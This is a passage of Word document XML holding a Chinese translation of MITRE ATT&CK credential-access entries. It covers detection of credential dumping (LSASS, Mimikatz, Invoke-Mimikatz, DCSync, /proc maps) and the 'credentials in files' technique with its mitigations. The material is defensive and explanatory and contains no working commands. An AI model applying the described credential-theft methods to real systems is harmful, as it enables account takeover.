          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来避开</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件访问防御。其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转储程序会</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在读取哈希值之前对</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表进行内存复制。检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者已入侵并</w:t>
      </w:r>
      <w:r>
        <w:t>正</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用的有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可能会有所帮助。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF109E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 8.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Server 2012 R2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSASS.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为受保护的进程启动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D4136" w14:textId="40869FE5" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序执行的进程和命令行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数来查看</w:t>
      </w:r>
      <w:r>
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:t>导出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r>
        <w:t>的指示信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程访问工具可能包含内置功能或合并了</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现有工具。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还存在包含</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Invoke-Mimikatz</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要在操作系统中配置日志功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集必要的信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B76DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域控制器日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否有复制请求以及可能与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的其他计划外活动。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要注意</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域控制器可能不会记录源自默认域控制器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的复制请求。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还需要</w:t>
      </w:r>
      <w:r>
        <w:t>监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r>
        <w:t>协议以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来自已知域控制器不相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的其他复制请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEB78E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00146707" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00146707">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A7C2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要获取存储在内存中的密码和哈希，进程必须在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统中打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程的映射文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该文件存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/proc//maps</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。其中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询此类身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据程序的唯一</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。许多</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发行版本中都带有</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AuditD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统中打开此文件的恶意进程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并抛出</w:t>
      </w:r>
      <w:r>
        <w:t>含</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此类程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程名称和参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>警告</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF66AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CABC2A" w14:textId="5EB534B9" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="63B97E0A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30A16DCD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1081</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BFE2372" w14:textId="1CA9A25F" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA29B51" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2D302B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r>
              <w:t>要求：文件访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C9DAEE0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384A8544" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r>
              <w:t>监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE75CE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId138" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="004727BF">
                <w:t>CAPEC-545</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE372D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E2540F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A76087E" w14:textId="68D47CCC" w:rsidR="00B93837" w:rsidRPr="00B93837" w:rsidRDefault="00B93837" w:rsidP="00B93837">
      <w:r w:rsidRPr="00B93837">
        <w:t>攻击者可能会在本地文件系统和远程文件共享中搜索包含密码的文件。这些文件可以是用户个人凭据的存储文件，一组用户共享凭据的存储文件，包含系统或服务密码的配置文件，或包含嵌入式密码的源代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93837">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93837">
        <w:t>二进制文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098384CB" w14:textId="6D307455" w:rsidR="00B93837" w:rsidRPr="003446E4" w:rsidRDefault="00B93837" w:rsidP="00B93837">
      <w:r w:rsidRPr="00B93837">
        <w:t>可以通过凭据导出技术从备份或保存的虚拟机中提取密码。还可以从</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93837">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93837">
        <w:t>域控制器上存储的组策略首选项中获取密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A1CD2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00872AC7" w14:paraId="02C4BD6E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0E707D02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0C786B9A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="359120F6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A3C734" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId139" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>活动目录配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="361DF01C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>删除易受攻击的组策略首选项。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="4CC1A676" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BAA5F73" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId140" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>审核</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="721C8FB2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>抢先搜索包含密码的文件。一旦发现</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请采取措施降低风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
